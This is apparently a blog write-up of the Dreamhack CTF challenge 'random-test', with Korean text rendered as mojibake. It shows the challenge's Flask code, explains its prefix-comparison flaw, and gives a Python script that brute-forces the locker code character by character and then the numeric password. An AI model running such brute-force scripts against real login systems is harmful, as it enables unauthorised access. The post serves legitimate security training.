๐Ÿ” Security/Web

[๋“œ๋ฆผํ•ต(Dreamhack) random-test

Rosieblue 2023. 9. 26. 19:07
728x90

์ด๋Ÿฐ์‹์œผ๋กœ ์‚ฌ๋ฌผํ•จ์ด๋ž‘ ์ž๋ฌผ์‡  ๋น„๋ฒˆ์„ ๋งž์ถฐ์•ผํ•˜๋Š” ๋ฌธ์ œ์ด๋‹ค

์‚ฌ๋ฌผํ•จ ๋ฒˆํ˜ธ๋Š” ์•ŒํŒŒ๋ฒณ ์†Œ๋ฌธ์ž ํ˜น์€ ์ˆซ์ž๋ฅผ ํฌํ•จํ•˜๋Š” 4์ž๋ฆฌ ๋žœ๋ค ๋ฌธ์ž์—ด์ด๊ณ , ๋น„๋ฐ€๋ฒˆํ˜ธ๋Š” 100 ์ด์ƒ 200 ์ดํ•˜์˜ ๋žœ๋ค ์ •์ˆ˜๋ผ๊ณ  ํ•œ๋‹ค

#!/usr/bin/python3
from flask import Flask, request, render_template
import string
import random

app = Flask(__name__)

try:
    FLAG = open("./flag.txt", "r").read()       # flag is here!
except:
    FLAG = "[**FLAG**]"


rand_str = ""
alphanumeric = string.ascii_lowercase + string.digits #์†Œ๋ฌธ์ž or ์ˆซ์ž
for i in range(4):
    rand_str += str(random.choice(alphanumeric)) #4๊ธ€์ž

rand_num = random.randint(100, 200) #100~200


@app.route("/", methods = ["GET", "POST"])
def index():
    if request.method == "GET":
        return render_template("index.html")
    else:
        locker_num = request.form.get("locker_num", "")
        password = request.form.get("password", "")

        if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:
            if locker_num == rand_str and password == str(rand_num):
                return render_template("index.html", result = "FLAG:" + FLAG)
            return render_template("index.html", result = "Good")
        else: 
            return render_template("index.html", result = "Wrong!")
            
            
app.run(host="0.0.0.0", port=8000)

 

์ฃผ๋ชฉํ•ด์•ผํ•  ๋ถ€๋ถ„์€ ์•„๋ž˜ ์ฝ”๋“œ์ด๋‹ค

if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:

locker_num๋งŒํผ๋งŒ ๋น„๊ตํ•˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ํ•œ ๊ธ€์ž ๋น„๊ต, ~, ๋„ค ๊ธ€์ž ๋น„๊ต ์ด๋Ÿฐ์‹์œผ๋กœ ํ•˜๋ฉด ๋œ๋‹ค

locker_num๋งŒ ๋งž์œผ๋ฉด Good์„ ๋ฐ˜ํ™˜ํ•˜๊ธฐ ๋•Œ๋ฌธ์ด๋‹ค!

 

 

์ฒ˜์Œ์œผ๋กœ requests ๋ชจ๋“ˆ์„ ์ œ๋Œ€๋กœ ์ด์šฉํ•ด๋ดค๋Š”๋ฐ ์ด ๋ฌธ์ œ๋ฅผ ํ†ตํ•ด ์กฐ๊ธˆ ์ต์ˆ™ํ•ด์ง„ ๊ฒƒ ๊ฐ™๋‹ค!

import requests
import string

url="http://host3.dreamhack.games:16258/"

data={"locker_num":"","password":""}
locker_num=['0','0','0','0']
password="100"

#if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:
alpahnumeric=string.ascii_lowercase+string.digits


for i in range(0,4):
    for ch in alpahnumeric:
        locker_num[i]=ch
        data["locker_num"]=''.join(locker_num[:i+1])
        print(data["locker_num"])
        r=requests.post(url=url,data=data)

        if r.text.find("Good")!=-1:
            break
print("Locker_num is",''.join(locker_num))


for i in range(100,201):
    #data["locker_num"]=''.join(locker_num)
    data["locker_num"]='n7pr'
    data["password"]=i
    r=requests.post(url=url,data=data)
    print(i)
    if r.text.find("FLAG")!=-1:
        password=data["password"]
        print("password is",password)
        break